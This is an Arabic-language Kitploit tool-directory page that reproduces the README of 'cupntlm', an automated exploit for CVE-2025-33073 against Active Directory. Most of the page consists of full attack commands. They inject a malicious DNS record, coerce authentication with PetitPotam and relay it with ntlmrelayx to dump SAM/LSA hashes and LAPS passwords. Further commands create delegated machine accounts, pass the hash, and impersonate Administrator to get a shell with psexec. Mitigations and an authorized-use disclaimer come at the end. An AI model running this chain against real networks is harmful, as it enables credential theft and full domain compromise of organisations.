Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cupntlm-Automated-Exploit-For-CVE-2025-33073- — cupntlm | Kitploit
أدوات/GitHubGitHub/egcupcake/cupntlm-automated-exploit-for-cve-2025-33073-
تصعيد الامتيازاتالاستطلاعتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةجمع المعلوماتما بعد الاستغلالاختبار الاختراقالقيادة والسيطرة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
المصادقة
الفريق الأحمر
تحليل DNS
GitHubegcupcake/cupntlm-automated-exploit-for-cve-2025-33073-

cupntlm-Automated-Exploit-For-CVE-2025-33073-

cupntlm

عرض المستودع
3منذ 4 أشهرلم تتم المراجعة بعد

cupntlm

CVE-2025-33073 — تجاوز انعكاس NTLM عبر إكراه DNS
أداة استغلال مؤتمتة لبيئات Active Directory.


نظرة عامة

يقوم cupntlm بأتمتة سلسلة هجوم انعكاس/تتابع NTLM التي تستغل CVE-2025-33073. يجمع بين حقن سجلات DNS، وإكراه المصادقة القسري (PetitPotam)، وتتابع NTLM في سير عمل واحد. تدعم الأداة وضعين تشغيليين اعتمادًا على النطاق ومتطلبات التخفي.

ملخص سلسلة الهجوم

root@kitploit:~
Attacker                    Domain Controller              Target Host
   │                               │                            │
   │── 1. Inject DNS record ───────▶│                            │
   │      (attacker IP as target)   │                            │
   │                                │                            │
   │── 2. Coerce auth (PetitPotam) ─────────────────────────────▶│
   │                                │                            │
   │◀─ 3. NTLM auth forwarded back ─────────────────────────────│
   │                                │                            │
   │── 4. Relay to DC ─────────────▶│                            │
   │      (ntlmrelayx)              │                            │
   │                                │                            │
   │◀─ 5. Shell / secretsdump / etc.│                            │

المتطلبات المسبقة على الشبكة المستهدفة:

  • توقيع SMB معطّل على هدف التتابع
  • حساب مجال صالح بصلاحيات منخفضة (القراءة فقط كافية)
  • وصول شبكي إلى وحدة تحكم المجال (المنفذ 389 LDAP، 445 SMB)

المتطلبات

حزم النظام

مكتبات Python

المكتبةالتثبيت
impacketpip3 install impacket --break-system-packages
coloramapip3 install colorama --break-system-packages
dnspythonpip3 install dnspython --break-system-packages

محتويات مجلد exploit/ (يتم تعبئته تلقائيًا بواسطة setup.sh)

root@kitploit:~
exploit/
├── cupntlm.py
├── ntlmrelayx.py       # from impacket
├── dnstool.py          # from krbrelayx
├── lib/                # krbrelayx support library
└── PetitPotam.py

التثبيت

root@kitploit:~
git clone https://github.com/EgCupCake/cupntlm.git
cd cupntlm
sudo bash setup.sh

الاستخدام

وضع الفحص — التحقق من جدوى الهجوم

يفحص حالة توقيع SMB على الأهداف ويتحقق من بيانات اعتماد المجال قبل محاولة أي شيء.

root@kitploit:~
cd exploit
sudo python3 cupntlm.py check \
  --domain lab.local \
  --user pentester \
  --pass 'P@ss' \
  --dc-ip 10.0.0.1 \
  --relay-ip 192.168.1.100

الوضع لكل هدف — سجل DNS منفصل لكل مضيف

ينشئ سجل DNS فريدًا لكل هدف، ويطلق الإكراه واحدًا تلو الآخر، وينظف السجلات بين التكرارات. أبطأ لكنه أكثر دقة ويترك ضوضاء أقل.

root@kitploit:~
sudo python3 cupntlm.py per-target \
  --targets targets.txt \
  --domain lab.local \
  --user pentester \
  --pass 'P@ss' \
  --dc-ip 10.0.0.1 \
  --relay-ip 192.168.1.100 \
  --loot loot.txt

الوضع الفردي — سجل DNS واحد وتتابع مستمر

يحقن سجل DNS واحدًا ويُبقي ntlmrelayx يعمل باستمرار أثناء التكرار عبر جميع الأهداف. أسرع للنطاقات الكبيرة.

root@kitploit:~
sudo python3 cupntlm.py single \
  --targets targets.txt \
  --domain lab.local \
  --user pentester \
  --pass 'P@ss' \
  --dc-ip 10.0.0.1 \
  --relay-ip 192.168.1.100 \
  --loot loot.txt

تنسيق targets.txt

root@kitploit:~
192.168.1.10
192.168.1.11
192.168.1.12

الاستغلال اليدوي

تعيد الخطوات التالية إنتاج سلسلة الهجوم كاملة يدويًا دون استخدام cupntlm.py. مفيدة لفهم البدائيات، أو تصحيح الأخطاء، أو التكيف مع بيئات غير قياسية.

الخطوة 1 — تعداد توقيع SMB

حدد المضيفات التي يكون فيها توقيع SMB معطلاً. هذه هي أهداف التتابع الصالحة لديك.

root@kitploit:~
netexec smb 192.168.1.0/24 --gen-relay-list targets_unsigned.txt

أو باستخدام nmap:

root@kitploit:~
nmap -p 445 --script smb2-security-mode 192.168.1.0/24

ابحث عن:

root@kitploit:~
Message signing enabled but not required   ← valid relay target
Message signing enabled and required       ← cannot relay here

الخطوة 2 — حقن سجل DNS خبيث

استخدم dnstool.py لإضافة سجل A في DNS الخاص بالمجال يشير باسم مضيف إلى جهازك. عندما يحل الهدف اسم المضيف هذا ويصادق، يصل الطلب إلى مستمع التتابع لديك.

root@kitploit:~
cd exploit/

python3 dnstool.py \
  -u "lab.local\\pentester" \
  -p 'P@ss' \
  --action add \
  --record 'attacker-relay' \
  --data 192.168.45.200 \        # your attacker IP
  --type A \
  10.0.0.1                       # DC IP

تحقق من إضافة السجل:

root@kitploit:~
python3 dnstool.py \
  -u "lab.local\\pentester" \
  -p 'P@ss' \
  --action query \
  --record 'attacker-relay' \
  10.0.0.1

الخطوة 3 — تشغيل مستمع تتابع NTLM

شغّل ntlmrelayx.py قبل إطلاق الإكراه. سينتظر ويترقب وصول المصادقات.

التتابع إلى SMB — تفريغ SAM/LSA:

root@kitploit:~
sudo python3 ntlmrelayx.py \
  -t smb://192.168.1.100 \
  -smb2support \
  --no-http-server

التتابع إلى LDAP — إنشاء حساب جهاز جديد (لـ RBCD / shadow credentials):

root@kitploit:~
sudo python3 ntlmrelayx.py \
  -t ldap://10.0.0.1 \
  --delegate-access \
  --no-smb-server \
  --no-http-server

التتابع إلى LDAPS — تفريغ أسرار المجال:

root@kitploit:~
sudo python3 ntlmrelayx.py \
  -t ldaps://10.0.0.1 \
  --dump-laps \
  --no-smb-server \
  --no-http-server

الخطوة 4 — إكراه المصادقة باستخدام PetitPotam

أجبر الجهاز المستهدف على المصادقة صادرًا إلى سجل DNS المحقون لديك. يستغل PetitPotam واجهة MS-EFSRPC — لا يتطلب بيانات اعتماد على المضيفات غير المُحدَّثة، أو استخدم بيانات اعتماد صالحة للمضيفات المُحدَّثة.

بدون مصادقة (هدف غير مُحدَّث):

root@kitploit:~
python3 PetitPotam.py \
  [dnsname] \         # your listener IP (matches DNS record)
  192.168.1.50             # target host to coerce

مع مصادقة (هدف مُحدَّث، يتطلب بيانات اعتماد صالحة):

root@kitploit:~
python3 PetitPotam.py \
  -u pentester \
  -p 'P@ss' \
  -d lab.local \
   [dnsname] \
  192.168.1.50

عند هذه النقطة، يرسل المضيف المُكرَه مصادقة NTLM إلى جهازك ← يلتقطها ntlmrelayx ويعيد توجيهها.


الخطوة 5 — جمع المخرجات

اعتمادًا على هدف التتابع الذي اخترته في الخطوة 3:

  • تتابع SMB → يفريغ ntlmrelayx التجزئات إلى stdout ويكتب <hostname>_samhashes.txt / _lsahashes.txt
  • تتابع LDAP مع delegate-access → يطبع ntlmrelayx اسم وكلمة مرور حساب الجهاز المُنشأ؛ تابع مع getST.py للحصول على تذكرة خدمة
  • تفريغ LDAPS → تُطبع كلمات مرور LAPS مباشرة

الخطوة 6 — تنظيف سجل DNS

أزل دائمًا سجلات DNS المحقونة بعد انتهاء المهمة.

root@kitploit:~
python3 dnstool.py \
  -u "lab.local\\pentester" \
  -p 'P@ss' \
  --action remove \
  --record 'attacker-relay' \
  --data 192.168.45.200 \
  --type A \
  10.0.0.1

أمثلة ما بعد الاستغلال

Pass-the-hash باستخدام حساب جهاز مُعاد توجيهه:

root@kitploit:~
impacket-secretsdump \
  'lab.local/MACHINE$'@10.0.0.1 \
  -hashes :aad3b435b51404eeaad3b435b51404ee:<NT_HASH>

الحصول على تذكرة خدمة لـ S4U2Self (بعد RBCD):

root@kitploit:~
impacket-getST \
  -spn cifs/TARGET.lab.local \
  -impersonate Administrator \
  'lab.local/ATTACKERMACHINE$:password'

استخدام التذكرة:

root@kitploit:~
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass TARGET.lab.local

الإجراءات التخفيفية

الإجراءالتأثير
تفعيل توقيع SMB (مطلوب) على جميع المضيفات

إخلاء المسؤولية

هذه الأداة مخصصة لاختبار الاختراق المصرح به والبحث الأمني فقط.
لا تستخدمها ضد أنظمة لا تملك إذنًا كتابيًا صريحًا لاختبارها.


الاعتمادات

  • fortra/impacket — ntlmrelayx
  • dirkjanm/krbrelayx — dnstool
  • topotam/PetitPotam — إكراه EFS
تنزيل الأداة
الأداةالغرض
python3بيئة التشغيل
pip3مدير حزم Python
gitاستنساخ التبعيات
wgetتنزيل الملفات
nmapتعداد توقيع SMB
netexec / crackmapexecفحص توقيع SMB (اختياري)
يكسر التتابع إلى SMB
تفعيل توقيع LDAP + ربط القنوات (channel binding)يكسر التتابع إلى LDAP/LDAPS
تطبيق تصحيح MS-EFSRPC (KB5005413)يمنع PetitPotam غير المصادَق
تقييد إنشاء سجلات DNS على المسؤولينيمنع خطوة حقن DNS
تعطيل مصادقة NTLM عبر الشبكة (يُفضَّل Kerberos)يقضي على هذه الفئة من الهجمات بالكامل